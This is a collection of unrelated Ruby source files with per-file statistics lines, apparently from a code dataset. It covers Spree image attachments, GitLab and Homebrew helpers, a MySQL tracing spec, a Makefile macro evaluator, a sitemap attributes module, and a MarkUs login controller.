klass.define_singleton_method(:"find_by_#{field_name}") do |token|
if token.is_a?(Array)
self.in field_name.to_sym => token
else
self.find_by field_name.to_sym => token
end
end
end
end
end
end
| 24.875 | 74 | 0.613065 |
6a258c3ac5a6a47ba4fe185a3bf004f3ff102f2f | 1,921 | # frozen_string_literal: true
module Spree::Image::PaperclipAttachment
extend ActiveSupport::Concern
included do
validate :no_attachment_errors
has_attached_file :attachment,
styles: { mini: '48x48>', small: '400x400>', product: '680x680>', large: '1200x1200>' },
default_style: :product,
default_url: 'noimage/:style.png',
url: '/spree/products/:id/:style/:basename.:extension',
path: ':rails_root/public/spree/products/:id/:style/:basename.:extension',
convert_options: { all: '-strip -auto-orient -colorspace sRGB' }
validates_attachment :attachment,
presence: true,
content_type: { content_type: Spree::Config.allowed_image_mime_types }
# save the w,h of the original image (from which others can be calculated)
# we need to look at the write-queue for images which have not been saved yet
after_post_process :find_dimensions, if: :valid?
end
def url(size)
attachment.url(size)
end
def filename
attachment_file_name
end
def attachment_present?
attachment.present?
end
def find_dimensions
temporary = attachment.queued_for_write[:original]
filename = temporary.path unless temporary.nil?
filename = attachment.path if filename.blank?
geometry = Paperclip::Geometry.from_file(filename)
self.attachment_width = geometry.width
self.attachment_height = geometry.height
end
# if there are errors from the plugin, then add a more meaningful message
def no_attachment_errors
unless attachment.errors.empty?
# uncomment this to get rid of the less-than-useful interim messages
# errors.clear
errors.add :attachment, "Paperclip returned errors for file '#{attachment_file_name}' - check ImageMagick installation or image source file."
false
end
end
end
| 34.303571 | 147 | 0.684019 |
91a335cd504658eae717a81fd8cfed44bc7a299b | 842 | # frozen_string_literal: true
module AutoDevopsHelper
def show_auto_devops_callout?(project)
Feature.disabled?(:auto_devops_banner_disabled) &&
show_callout?('auto_devops_settings_dismissed') &&
can?(current_user, :admin_pipeline, project) &&
project.has_auto_devops_implicitly_disabled? &&
!project.repository.gitlab_ci_yml &&
!project.ci_integration
end
def badge_for_auto_devops_scope(auto_devops_receiver)
return unless auto_devops_receiver.auto_devops_enabled?
case auto_devops_receiver.first_auto_devops_config[:scope]
when :project
nil
when :group
s_('CICD|group enabled')
when :instance
s_('CICD|instance enabled')
end
end
def auto_devops_settings_path(project)
project_settings_ci_cd_path(project, anchor: 'autodevops-settings')
end
end
| 28.066667 | 71 | 0.748219 |
01323be37f16b429116f16b6cbe1fe43d8ef3efe | 194 | def image_fixture_file
@image_fixture_file ||= File.open(Rails.root.join('test/fixtures/minister-of-funk.960x640.jpg'))
end
Dir[Rails.root.join('test/factories/*.rb')].each { |f| require f }
| 32.333333 | 98 | 0.737113 |
4a5556725895a92376adf06a653f8f7720a03053 | 2,852 | # frozen_string_literal: true
require "search"
module Cask
class Cmd
# Abstract superclass for all `brew cask` commands.
#
# @api private
class AbstractCommand
include Homebrew::Search
def self.min_named
nil
end
def self.max_named
nil
end
def self.banner_args
if min_named == :cask && max_named != 1
" <cask>"
elsif max_named&.zero?
""
else
" [<cask>]"
end
end
def self.banner_headline
"`#{command_name}` [<options>]#{banner_args}"
end
OPTIONS = [
[:switch, "--[no-]binaries", {
description: "Disable/enable linking of helper executables. Default: enabled",
env: :cask_opts_binaries,
}],
[:switch, "--require-sha", {
description: "Require all casks to have a checksum.",
env: :cask_opts_require_sha,
}],
[:switch, "--[no-]quarantine", {
description: "Disable/enable quarantining of downloads. Default: enabled",
env: :cask_opts_quarantine,
}],
].freeze
def self.parser(&block)
banner = <<~EOS
`cask` #{banner_headline}
#{description}
EOS
min_n = min_named
max_n = max_named
Cmd.parser do
usage_banner banner
instance_eval(&block) if block_given?
OPTIONS.each do |option|
send(*option)
end
min_named min_n unless min_n.nil?
max_named max_n unless max_n.nil?
end
end
def self.command_name
@command_name ||= name.sub(/^.*:/, "").gsub(/(.)([A-Z])/, '\1_\2').downcase
end
def self.abstract?
name.split("::").last.match?(/^Abstract[^a-z]/)
end
def self.visible?
true
end
def self.help
parser.generate_help_text
end
def self.short_description
description.split(".").first
end
def self.run(*args)
new(*args).run
end
attr_reader :args
def initialize(*args)
@args = self.class.parser.parse(args)
end
private
def casks(alternative: -> { [] })
return @casks if defined?(@casks)
@casks = args.named.empty? ? alternative.call : args.named.to_casks
rescue CaskUnavailableError => e
reason = [e.reason, *suggestion_message(e.token)].join(" ")
raise e.class.new(e.token, reason)
end
def suggestion_message(cask_token)
matches = search_casks(cask_token)
if matches.one?
"Did you mean “#{matches.first}”?"
elsif !matches.empty?
"Did you mean one of these?\n#{Formatter.columns(matches.take(20))}"
end
end
end
end
end
| 22.456693 | 88 | 0.539972 |
f8b25a0438e50bd4baba11d2044ef35c64af18ba | 299 | require 'rails_helper'
RSpec.describe StoryText, type: :model do
it "has a limit on the story cache field" do
s = StoryText.new
s.body = "Z" * 16_777_218
s.valid?
expect(s.errors[:body]).to eq([I18n.t('activerecord.errors.models.story_text.attributes.body.too_long')])
end
end
| 24.916667 | 109 | 0.695652 |
1a69eb0b7a8e919ad0d204d4d03f761633fcdd17 | 952 | property :git_url, String
use 'common_properties'
action_class do
include Asdf::Cookbook::Helpers
def plugin_installed?
::Dir.exist?("#{asdf_path}/plugins/#{new_resource.name}")
end
def plugin_can_be_updated?
new_resource.name == '--all' || new_resource.name != '--all' && plugin_installed?
end
end
action :add do
asdf_script "asdf plugin add #{new_resource.name}" do
live_stream new_resource.live_stream
user new_resource.user if new_resource.user
not_if { plugin_installed? }
end
end
action :update do
asdf_script "asdf plugin update #{new_resource.name}" do
live_stream new_resource.live_stream
user new_resource.user if new_resource.user
only_if { plugin_can_be_updated? }
end
end
action :remove do
asdf_script "asdf plugin remove #{new_resource.name}" do
live_stream new_resource.live_stream
user new_resource.user if new_resource.user
only_if { plugin_installed? }
end
end
| 23.8 | 85 | 0.740546 |
1a33d33fa377073b7f490383d9d0d2fe5c43f5da | 524 | namespace :db do
namespace :mongoid do
desc 'Migrate the documents specified by criteria. criteria is optional'
task :lazy_migrate, [:criteria] => :environment do |t, args|
criteria = args.criteria ? eval(args.criteria) : nil
Mongoid::LazyMigration.migrate(criteria)
end
desc 'Cleanup a migration'
task :cleanup_migration, [:model] => :environment do |t, args|
raise "Please provide a model" unless args.model
Mongoid::LazyMigration.cleanup(eval(args.model))
end
end
end
| 32.75 | 76 | 0.692748 |
62565e86ea47b48ee0dd7503834dac9e78c6ae71 | 174 | class AppsController < InheritedResources::Base
authorize_resource
private
def app_params
params.require(:app).permit(:name, :url, :description)
end
end
| 15.818182 | 60 | 0.718391 |
bbd2dc293b4538dbb4dd654f875038eba383dcd6 | 2,558 | require 'spec_helper'
RSpec.describe Mysql2::Instrumentation do
describe "Class Methods" do
it { should respond_to :instrument }
end
let (:tracer) { OpenTracingTestTracer.build }
before do
Mysql2::Instrumentation.instrument(tracer: tracer)
# prevent actual client connections
allow_any_instance_of(Mysql2::Client).to receive(:connect) do |*args|
@connect_args = []
@connect_args << args
end
# mock query_original, since we don't care about the results
allow_any_instance_of(Mysql2::Client).to receive(:query_original).and_return(Mysql2::Result.new)
end
let (:host) { 'localhost '}
let (:database) { 'test_sql2 '}
let (:username) { 'root '}
let (:client) { Mysql2::Client.new(:host => host, :database => database, :username => username) }
describe :instrument do
it "patches the class's query method" do
expect(client).to respond_to(:query)
expect(client).to respond_to(:query_original)
end
end
describe 'successful query' do
it 'calls query_original when calling query' do
expect(client).to receive(:query_original)
client.query("SELECT * FROM test_mysql2")
end
it 'adds a span for a query with tags' do
statement = "SELECT * FROM test_mysql2" * 4096
client.query(statement)
expect(tracer.spans.count).to eq 1
expect(tracer.spans.last.operation_name).to eq 'SELECT'
expected_tags = {
'component' => 'mysql2',
'db.type' => 'mysql',
'span.kind' => 'client',
'db.instance' => database,
'db.statement' => statement[0..1023],
'db.user' => username,
}
expect(tracer.spans.last.tags).to eq expected_tags
end
end
describe 'failed query' do
before do
allow(client).to receive(:query_original).and_raise('error')
end
it 'sets the error tag and log' do
statement = 1234
error = nil
begin
client.query(statement)
rescue => e
error = e
end
expected_tags = {
'component' => 'mysql2',
'db.type' => 'mysql',
'span.kind' => 'client',
'db.instance' => database,
'db.statement' => statement.to_s,
'db.user' => username,
'error' => true,
'sfx.error.kind' => error.class.to_s,
'sfx.error.message' => error.to_s,
'sfx.error.stack' => error.backtrace.join('\n')
}
expect(tracer.spans.last.tags).to eq expected_tags
expect(tracer.spans.last.operation_name).to eq 'sql.query'
end
end
end
| 27.804348 | 100 | 0.622752 |
ff37f1d33329adf604e7a5dd761ce70377b62dbb | 397 | require 'sms_tools/version'
require 'sms_tools/encoding_detection'
require 'sms_tools/gsm_encoding'
if defined?(::Rails) and ::Rails.version >= '3.1'
require 'sms_tools/rails/engine'
end
module SmsTools
class << self
def use_gsm_encoding?
@use_gsm_encoding.nil? ? true : @use_gsm_encoding
end
def use_gsm_encoding=(value)
@use_gsm_encoding = value
end
end
end
| 19.85 | 55 | 0.715365 |
bb3f67fc5d4e3d91900f470769552f4862aae0bd | 79 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'extrapost'
| 26.333333 | 58 | 0.734177 |
e9e6585c15f28af1009d67edcb3e85820bb115ae | 746 | Before do
# As of 2017-10-30 it appears that tests do not complete in linux environments
# if an element is not visible on the page. This should not be a problem and
# cannot be replicated locally when running on OSX, however has been confirmed
# in our AWS environments and on local Ubuntu machines.
# Therefore we've added this functionality that looks for a custom
# window_size element on the config object and if present, sets the window
# size at the start of each test
if Quke::Quke.config.custom && Quke::Quke.config.custom["window_size"]
Capybara.current_session.current_window.resize_to(
Quke::Quke.config.custom["window_size"]["width"],
Quke::Quke.config.custom["window_size"]["height"]
)
end
end
| 46.625 | 80 | 0.739946 |
1a8d9c8174e9130bf5be8915e198bb1b4366abd6 | 16,439 |
# Controller responsible for providing login and logout processes
# as well as displaying main page
class MainController < ApplicationController
include ApplicationHelper, MainHelper
protect_from_forgery with: :exception, except: [:login, :page_not_found]
# check for authorization
before_action :authorize_for_user,
except: [:login,
:page_not_found,
:check_timeout]
before_action :authorize_for_admin_and_admin_logged_in_as, only: [:login_as]
layout 'main'
#########################################################################
# Authentication
# Handles login requests; usually redirected here when trying to access
# the website and has not logged in yet, or session has expired. User
# is redirected to main page if session is still active and valid.
def login
session[:job_id] = nil
# external auth has been done, skip markus authorization
if MarkusConfigurator.markus_config_remote_user_auth
if @markus_auth_remote_user.nil?
render 'shared/http_status', formats: [:html], locals: { code: '403', message: HttpStatusHelper::ERROR_CODE['message']['403'] }, status: 403, layout: false
return
else
login_success = login_without_authentication(@markus_auth_remote_user)
if login_success
uri = session[:redirect_uri]
session[:redirect_uri] = nil
refresh_timeout
current_user.set_api_key # set api key in DB for user if not yet set
# redirect to last visited page or to main page
redirect_to( uri || { action: 'index' } )
return
else
@login_error = flash[:error][0]
render :remote_user_auth_login_fail
return
end
end
end
# Check if it's the user's first visit this session
# Need to accommodate redirects for locale
if params.key?(:locale)
if session[:first_visit].nil?
@first_visit = true
session[:first_visit] = 'false'
else
@first_visit = false
end
end
@current_user = current_user
# redirect to main page if user is already logged in.
if logged_in? && !request.post?
redirect_to action: 'index'
return
end
return unless request.post?
# strip username
params[:user_login].strip!
# Get information of the user that is trying to login if his or her
# authentication is valid
validation_result = validate_user(params[:user_login], params[:user_login], params[:user_password])
unless validation_result[:error].nil?
flash_now(:error, validation_result[:error])
render :login, locals: { user_login: params[:user_login] }
return
end
# validation worked
found_user = validation_result[:user]
if found_user.nil?
return
end
# Has this student been hidden?
if found_user.student? && found_user.hidden
flash_now(:error, I18n.t('account_disabled'))
redirect_to(action: 'login') && return
end
self.current_user = found_user
if logged_in?
uri = session[:redirect_uri]
session[:redirect_uri] = nil
refresh_timeout
current_user.set_api_key # set api key in DB for user if not yet set
# redirect to last visited page or to main page
redirect_to( uri || { action: 'index' } )
else
flash_now(:error, I18n.t(:login_failed))
end
end
# Clear the sesssion for current user and redirect to login page
def logout
logout_redirect = MarkusConfigurator.markus_config_logout_redirect
if logout_redirect == 'NONE'
page_not_found
return
end
m_logger = MarkusLogger.instance
# The real_uid field of session keeps track of the uid of the original
# user that is logged in if there is a role switch
if !session[:real_uid].nil? && !session[:uid].nil?
#An admin was logged in as a student or grader
m_logger.log("Admin '#{User.find_by_id(session[:real_uid]).user_name}' logged out from '#{User.find_by_id(session[:uid]).user_name}'.")
else
#The user was not assuming another role
m_logger.log("User '#{current_user.user_name}' logged out.")
end
clear_session
cookies.delete :auth_token
reset_session
if logout_redirect == 'DEFAULT'
redirect_to action: 'login'
else
redirect_to logout_redirect
end
end
def index
@current_user = current_user
if @current_user.student? or @current_user.ta?
redirect_to controller: 'assignments', action: 'index'
return
end
@assignments = Assignment.unscoped.includes([
:assignment_stat, :groupings, :ta_memberships,
:pr_assignment,
groupings: :current_submission_used,
submission_rule: :assignment
]).order('due_date ASC')
@grade_entry_forms = GradeEntryForm.unscoped.includes([
:grade_entry_items
]).order('id ASC')
@current_assignment = Assignment.get_current_assignment
@current_ta = @current_assignment.tas.first unless @current_assignment.nil?
@tas = @current_assignment.tas unless @current_assignment.nil?
render :index, layout: 'content'
end
def about
# dummy action for remote rjs calls
# triggered by clicking on the about icon
end
def reset_api_key
render 'shared/http_status', formats: [:html], locals: { code: '404', message: HttpStatusHelper::ERROR_CODE['message']['404'] }, status: 404, layout: false and return unless request.post?
# Students shouldn't be able to change their API key
unless @current_user.student?
@current_user.reset_api_key
@current_user.save
else
render 'shared/http_status', formats: [:html], locals: { code: '404', message: HttpStatusHelper::ERROR_CODE['message']['404'] }, status: 404, layout: false and return
end
render 'api_key_replace', locals: {user: @current_user },
formats: [:js], handlers: [:erb]
end
# Render 404 error (page not found) if no other route matches.
# See config/routes.rb
def page_not_found
render 'shared/http_status', formats: [:html], locals: { code: '404', message: HttpStatusHelper::ERROR_CODE['message']['404'] }, status: 404, layout: false
end
# Authenticates the admin (i.e. validates her password). Given the user, that
# the admin would like to login as and the admin's password switch to the
# desired user on success.
#
# If the current user already recorded, matches the password entered in the
# form, grant the current user (an admin) access to the account of the user
# name entered in the form.
#
# Relevant partials:
# role_switch_handler
# role_switch_error
# role_switch_content
# role_switch
def login_as
validation_result = nil
real_user = (session[:real_uid] && User.find_by_id(session[:real_uid])) ||
current_user
if MarkusConfigurator.markus_config_remote_user_auth
validation_result = validate_user_without_login(
params[:effective_user_login],
real_user.user_name)
else
validation_result = validate_user(
params[:effective_user_login],
real_user.user_name,
params[:admin_password])
end
unless validation_result[:error].nil?
# There were validation errors
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
locals: { error: validation_result[:error] }
return
end
found_user = validation_result[:user]
if found_user.nil?
return
end
# Check if an admin trying to login as the current user
if found_user == current_user
# error
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
# TODO: put better error message
locals: { error: I18n.t(:login_failed) }
return
end
# Check if an admin is trying to login as another admin.
# Should not be allowed unless switching back to original admin role
if found_user.admin? && found_user != real_user
# error
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
locals: { error: I18n.t(:cannot_login_as_another_admin) }
return
end
# Save the uid of the admin that is switching roles if not already saved
session[:real_uid] ||= session[:uid]
# Log the date that the role switch occurred
m_logger = MarkusLogger.instance
if current_user != real_user
# Log that the admin dropped role of another user
m_logger.log("Admin '#{real_user.user_name}' logged out from " +
"'#{current_user.user_name}'.")
end
if found_user != real_user
# Log that the admin assumed role of another user
m_logger.log("Admin '#{real_user.user_name}' logged in as " +
"'#{found_user.user_name}'.")
else
# Reset real user id because admin resumed their real role
session[:real_uid] = nil
end
# Change the uid of the current user
self.current_user = found_user
if logged_in?
session[:redirect_uri] = nil
refresh_timeout
current_user.set_api_key # set api key in DB for user if not yet set
# All good, redirect to the main page of the viewer, discard
# role switch modal
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
locals: { error: nil }
else
render partial: 'role_switch_handler',
formats: [:js], handlers: [:erb],
locals: { error: I18n.t(:login_failed) }
end
end
def role_switch
# dummy action for remote rjs calls
# triggered by clicking on the "Switch role" link
# please keep.
end
# Action only relevant if REMOTE_USER config is on and if an
# admin switched role. Since there might not be a logout link
# provide a vehicle to expire the session (I.e. cancel the
# role switch).
def clear_role_switch_session
m_logger = MarkusLogger.instance
# The real_uid field of session keeps track of the uid of the original
# user that is logged in if there is a role switch
if !session[:real_uid].nil? && !session[:uid].nil?
# An admin was logged in as a student or grader
m_logger.log("Admin '#{User.find_by_id(session[:real_uid]).user_name}' logged out from '#{User.find_by_id(session[:uid]).user_name}'.")
else
#The user was not assuming another role
m_logger.log("WARNING: Possible break in attempt from '#{current_user.user_name}'.")
end
clear_session
cookies.delete :auth_token
reset_session
redirect_to action: 'login'
end
def check_timeout
if !check_warned && check_imminent_expiry
render template: 'main/timeout_imminent'
set_warned
else
head :ok
end
end
private
def login_without_authentication(markus_auth_remote_user)
found_user = User.authorize(markus_auth_remote_user)
# if not nil, user authorized to enter MarkUs
if found_user.nil?
# This message actually means "User not allowed to use MarkUs",
# but it's from a security-perspective
# not a good idea to report this to the outside world. It makes it
# easier for attempted break-ins
# if one can distinguish between existent and non-existent users.
flash_message(:error, I18n.t(:login_failed))
return false
end
# Has this student been hidden?
if found_user.student? && found_user.hidden
flash_message(:error, I18n.t('account_disabled'))
return false
end
# For admins we have a possibility of role switches,
# so check if the real_uid is set in the session.
if found_user.admin? && !session[:real_uid].nil? &&
session[:real_uid] != session[:uid]
self.current_user = User.find_by_id(session[:uid])
m_logger = MarkusLogger.instance
m_logger.log("Admin '#{found_user.user_name}' logged in as '#{current_user.user_name}'.")
else
self.current_user = found_user
end
if logged_in?
true
else
flash_message(:error, I18n.t(:login_failed))
false
end
end
# Returns the user with user name "effective_user" from the database given that the user
# with user name "real_user" is authenticated. Effective and real users might be the
# same for regular logins and are different on an assume role call.
#
# This function is called both by the login and login_as actions.
def validate_user(effective_user, real_user, password)
validation_result = Hash.new
validation_result[:user] = nil # Let's be explicit
# check for blank username and password
blank_login = effective_user.blank?
blank_pwd = password.blank?
validation_result[:error] = get_blank_message(blank_login, blank_pwd)
return validation_result if blank_login || blank_pwd
# Two stage user verification: authentication and authorization
authenticate_response = User.authenticate(real_user,
password)
if authenticate_response == User::AUTHENTICATE_BAD_PLATFORM
validation_result[:error] = I18n.t('external_authentication_not_supported')
return validation_result
end
if (defined? VALIDATE_CUSTOM_STATUS_DISPLAY) &&
authenticate_response == User::AUTHENTICATE_CUSTOM_MESSAGE
validation_result[:error] = VALIDATE_CUSTOM_STATUS_DISPLAY
return validation_result
end
if authenticate_response == User::AUTHENTICATE_SUCCESS
# Username/password combination is valid. Check if user is
# allowed to use MarkUs.
#
# sets this user as logged in if effective_user is a user in MarkUs
found_user = User.authorize(effective_user)
# if not nil, user authorized to enter MarkUs
if found_user.nil?
# This message actually means "User not allowed to use MarkUs",
# but it's from a security-perspective
# not a good idea to report this to the outside world. It makes it
# easier for attempted break-ins
# if one can distinguish between existent and non-existent users.
if defined? VALIDATE_USER_NOT_ALLOWED_DISPLAY
validation_result[:error] = VALIDATE_USER_NOT_ALLOWED_DISPLAY
else
validation_result[:error] = I18n.t(:login_failed)
end
return validation_result
end
else
if defined? VALIDATE_LOGIN_INCORRECT_DISPLAY
validation_result[:error] = VALIDATE_LOGIN_INCORRECT_DISPLAY
else
validation_result[:error] = I18n.t(:login_failed)
end
return validation_result
end
# All good, set error to nil. Let's be explicit.
# Also, set the user key to found_user
validation_result[:error] = nil
validation_result[:user] = found_user
validation_result
end
# Returns the user with user name "effective_user" from the database given that the user
# with user name "real_user" is authenticated. Effective and real users must be
# different.
def validate_user_without_login(effective_user, real_user)
validation_result = Hash.new
validation_result[:user] = nil # Let's be explicit
# check for blank username
blank_login = effective_user.blank?
validation_result[:error] = get_blank_message(blank_login, false)
return validation_result if blank_login
# Can't do user authentication, for a remote user setup, so
# only do authorization (i.e. valid user) checks.
found_user = User.authorize(effective_user)
# if not nil, user authorized to enter MarkUs
if found_user.nil?
# This message actually means "User not allowed to use MarkUs",
# but it's from a security-perspective
# not a good idea to report this to the outside world. It makes it
# easier for attempted break-ins
# if one can distinguish between existent and non-existent users.
if defined? VALIDATE_USER_NOT_ALLOWED_DISPLAY
validation_result[:error] = VALIDATE_USER_NOT_ALLOWED_DISPLAY
else
validation_result[:error] = I18n.t(:login_failed)
end
return validation_result
end
# All good, set error to nil. Let's be explicit.
# Also, set the user key to found_user
validation_result[:error] = nil
validation_result[:user] = found_user
validation_result
end
end
| 35.736957 | 191 | 0.673946 |
2179311b0d1636cefeb6925fa7c42f37b8111613 | 2,501 | module Gql::Runtime
# ATTENTION: use :: namespace
# Rubel::Base inherits from BasicObject. This means we don't have
# access to the default namespace, so prepend classes and modules
# with ::.
class Debug < Rubel::Runtime::Console
attr_reader :scope
def initialize(scope = nil)
@scope = scope
end
def logger
scope.graph.logger
end
def log(key, attr_name, options = {}, &block)
type = options.fetch(:type, :gql)
if block_given?
logger.log(type, key, attr_name, nil, options, &block)
else
logger.log(type, key, attr_name, nil, options)
end
end
include ::Gql::Runtime::Functions::Legacy
include ::Gql::Runtime::Functions::Constants
include ::Gql::Runtime::Functions::Traversal
include ::Gql::Runtime::Functions::Aggregate
include ::Gql::Runtime::Functions::Control
include ::Gql::Runtime::Functions::Lookup
include ::Gql::Runtime::Functions::Policy
include ::Gql::Runtime::Functions::Update
include ::Gql::Runtime::Functions::Helper
include ::Gql::Runtime::Functions::Curves
include ::Gql::Runtime::Functions::Core
module FunctionDebug
# @private
def update_element_with(object, attribute_name, value)
obj_key = object.key rescue nil
log("UPDATE", "#{scope.input_key}: #{obj_key}.#{attribute_name} =", :type => :update) do
super
end
end
def NORMCDF(*args)
log("NORMCDF", "NORMCDF") do
super
end
end
def Q(key)
log("Q", "Q: #{key}", :gquery_key => key) do
super
end
end
def GREATER(*args)
log("GREATER", "GREATER: #{args.join(' ')}") do
super
end
end
def M(elements, attr_name)
log("MAP: #{attr_name}", "MAP: #{attr_name}") do
super
end
end
def SQRT(*args)
log("SQRT", "SQRT") do
super
end
end
def PRODUCT(*args)
log("PRODUCT", "PRODUCT") do
super
end
end
def SUM(*args)
log("SUM", "SUM") do
super
end
end
def GET(element, attr_name)
key = element.key rescue nil
log("MAP/GET: #{key}", "MAP/GET: #{key}", {:node => key}) do
super
end
end
def G(key)
log("GROUP: #{key}", "GROUP: #{key}") do
super
end
end
end
include FunctionDebug
end
end
| 23.157407 | 96 | 0.555778 |
39489b77e8bb4041216c1d50c68f0aee4294943d | 1,728 | require 'set'
module Makefile
MACRO_REF_PATTERN = %r!
\$ (?:
\(
(?<paren> [^:)]+ ) (?: :(?<paren_subst>[^=]+) = (?<paren_substval>[^)]*) )?
\) |
{
(?<brace> [^:}]+ ) (?: :(?<brace_subst>[^=]+) = (?<brace_substval>[^}]*) )?
} |
(?<single> [^({] )
)
!x
# An expression which can contain macro reference
class Expression
def initialize(raw_text)
@raw_text = raw_text
end
attr_reader :raw_text
def evaluate(target=nil, macroset)
evaluate_internal(target, macroset, Set.new)
end
# Shows some implementation details of #evaluate
#
# Only Makefile::Macro is allowed to call this method.
# Others should use #evaluate
#
# @private
def evaluate_internal(target, macroset, parent_refs)
raw_text.gsub(MACRO_REF_PATTERN) do
match = $~
case
when match[:single]
type, name = :single, $~[:single]
when match[:paren]
type = :quoted
name = match[:paren]
substpat, substexpr = match[:paren_subst], match[:paren_substval]
when match[:brace]
type = :quoted
name = match[:brace]
substpat, substexpr = match[:brace_subst], match[:brace_substval]
else
raise 'never reach'
end
macro = macroset[name]
if macro&.match?(type)
expanded = macro.expand_internal(target, macroset, parent_refs)
next expanded unless substpat
replacement = Expression.new(substexpr).
evaluate_internal(target, macroset, parent_refs)
expanded.gsub(/#{Regexp.escape substpat}(?=\s|$)/, replacement)
end
end
end
end
end
| 27 | 83 | 0.5625 |
b9408fa6f3ffc5c9e3e9c75426155180c379a03e | 8,704 | require 'active_support/concern'
module DuckMap
##################################################################################
# This module has a single purpose. To declare a class-level attribute using the Rails class_attribute method.
# Also, we are using ActiveSupport::Concern and the included block. This module is included in
# ActionController::Base, so, every controller object will have the attribute.
#
# See {DuckMap::Attributes::ClassMethods#sitemap_attributes} for an explanation.
module InheritableClassAttributes
extend ActiveSupport::Concern
################################################################################
included do
class_eval do
class_attribute :sitemap_attributes_hash
class_attribute :sitemap_attributes_defined
end
end
end
##################################################################################
# Module used to add Sitemap attributes to an object.
module Attributes
extend ActiveSupport::Concern
##################################################################################
module ClassMethods
##################################################################################
## See {DuckMap::Attributes#is_sitemap_attributes_defined? is_sitemap_attributes_defined?}
# @return [TrueClass, FalseClass]
def is_sitemap_attributes_defined?
if self.sitemap_attributes_defined.nil?
self.sitemap_attributes_defined = false
end
return self.sitemap_attributes_defined
end
##################################################################################
# Returns the entire attributes Hash that has been defined for an object. The actual Hash is maintained via an accessor method named: sitemap_attributes_hash.
# {#sitemap_attributes sitemap_attributes} is actually a wrapper method for sitemap_attributes_hash accessor method.
#
# There are actually two definitions of sitemap_attributes_hash accessor method. The purpose of two definitions is to allow common code
# contained in {DuckMap::Attributes} to be included in the {DuckMap::Config} and all controller classes. The code works by referencing
# sitemap_attributes_hash accessor method, however, the actual variable reference is different depending on the object that is referring to it.
#
# When {DuckMap::Attributes} module is included in {DuckMap::Config}, then, self.sitemap_attributes_hash is actually referencing the class
# level method defined on {DuckMap::Config}.
#
# When {DuckMap::Attributes} module is included in all controller classes (it is by default), then, self.sitemap_attributes_hash
# is actually referencing the class level method defined by {DuckMap::InheritableClassAttributes} via class_attribute method.
# This means that the actual variable that will contain the Hash value never gets initialized. So, self.sitemap_attributes_hash
# will ALWAYS be uninitialized during the first access from within a controller and will ALWAYS copy values from {DuckMap::Config}.
#
# @return [Hash]
def sitemap_attributes
# check the current state of self.sitemap_attributes_hash. If it is a Hash, then, it is considered initialized.
# otherwise, a new Hash is populated and assigned to self.sitemap_attributes_hash and a reference is returned.
#
# when this module is included in DuckMap::Config self.sitemap_attributes_hash is actually referencing the class
# level method defined on DuckMap::Config.
#
# When this module is included in all controller classes self.sitemap_attributes_hash is actually referencing the class
# level method defined on InheritableClassAttributes which never gets initialized. So, self.sitemap_attributes_hash
# will NEVER be a Hash on the first access from within a controller and will ALWAYS copy values from {DuckMap::Config}
unless self.sitemap_attributes_hash.kind_of?(Hash)
# I actually have code to do a deep clone of a Hash, however, I can't release it right now.
# I will in a later release. For now, I will commit another sin.
self.sitemap_attributes_hash = {}
source = DuckMap::Config.sitemap_attributes_hash
source.each do |item|
self.sitemap_attributes_hash[item.first] = {}.merge(item.last)
self.sitemap_attributes_hash[item.first][:handler] = {}.merge(item.last[:handler])
end
end
return self.sitemap_attributes_hash
end
end
##################################################################################
# This is a simple boolean value with a specific purpose. It is used to indicate if the object
# being worked on actually defined attributes using {DuckMap::SitemapObject::ClassMethods#acts_as_sitemap acts_as_sitemap},
# {DuckMap::SitemapObject::ClassMethods#sitemap_handler sitemap_handler} or {DuckMap::SitemapObject::ClassMethods#sitemap_segments sitemap_segments}
#
# This has special meaning for ActiveRecord::Base objects. When {DuckMap::Handlers handler methods} evaluate a model, the model is asked
# if it defined it's own attributes.
#
# If the model did define it's own attributes, then, those attributes are used and override any attributes
# set via acts_as_sitemap, sitemap_handler, or sitemap_segments on the controller.
#
# If the model did not define it's own attributes, then, the attributes defined on the controller are used.
#
# Defaults from {DuckMap::Config} are used if neither controller nor model defined any attributes.
#
# @return [TrueClass, FalseClass]
def is_sitemap_attributes_defined?
return self.class.is_sitemap_attributes_defined?
end
##################################################################################
# Returns a Hash associated with a key. The Hash represents all of the attributes for
# a given action name on a controller.
#
# acts_as_sitemap :index, title: "my title" # index is the key
# sitemap_attributes("index") # index is the key
#
# @return [Hash]
def sitemap_attributes(key = :default)
key = key.blank? ? :default : key.to_sym
# if the key exists and has a Hash value, cool. Otherwise, go back to :default.
# self.class.sitemap_attributes should ALWAYS return a Hash, so, no need to test for that.
# however, key may or may not be a Hash. should test for that.
unless self.class.sitemap_attributes[key].kind_of?(Hash)
key = :default
end
# the :default Hash SHOULD ALWAYS be there. If not, this might cause an exception!!
return self.class.sitemap_attributes[key]
end
##################################################################################
# Wrapper method for {#sitemap_attributes sitemap_attributes} that returns a Hash stripped of key/value pairs
# where the value is another Hash.
#
# # normal
# values = sitemap_attributes("index")
# puts values #=> {:title=>:title, :keywords=>:keywords,
# # :description=>:description, :lastmod=>:updated_at,
# # :handler=>{:action_name=>:sitemap_index, :first_model=>true}}
#
# # stripped
# values = sitemap_stripped_attributes("index")
# puts values #=> {:title=>:title, :keywords=>:keywords,
# # :description=>:description, :lastmod=>:updated_at}
#
# @return [Hash]
def sitemap_stripped_attributes(key = :default)
values = {}
attributes = self.sitemap_attributes(key)
attributes.each do |pair|
# we are traversing a Hash in this loop.
# each item passed to the block is a two-element Array.
# the first element is a key and the second element is the value.
# given: {title: :my_title, handler: {action_name: :sitemap_index}}
# :title would be pair.first
# :my_title would be pair.last
# in the second case:
# :handler would be pair.first
# the Hash {action_name: :sitemap_index} would be pair.last
# we want to skip all the dark meat and keep the white meat.
# therefore, we are only interested in attributes that are on the first level.
# meaning, simple key/value pairs where the value is a value other than Hash.
unless pair.last.kind_of?(Hash)
values[pair.first] = pair.last
end
end
return values
end
end
end
| 47.824176 | 165 | 0.633617 |
08636561e48e31273a53cfc7306e85783b566d26 | 351 | class JobsController < ApplicationController
def index
@store = STORE
@crashes = CRASHES
end
def crashing
CrashingJob.new.async.perform
redirect_to jobs_path
end
def single
SingleJob.new.async.perform
redirect_to jobs_path
end
def multiple
MultipleJob.new.async.perform
redirect_to jobs_path
end
end
| 15.954545 | 44 | 0.723647 |
21d7373dedafca90843c038fcb773ede4e2bd0ac | 83 | ActsAsTaggableOn.force_lowercase = true
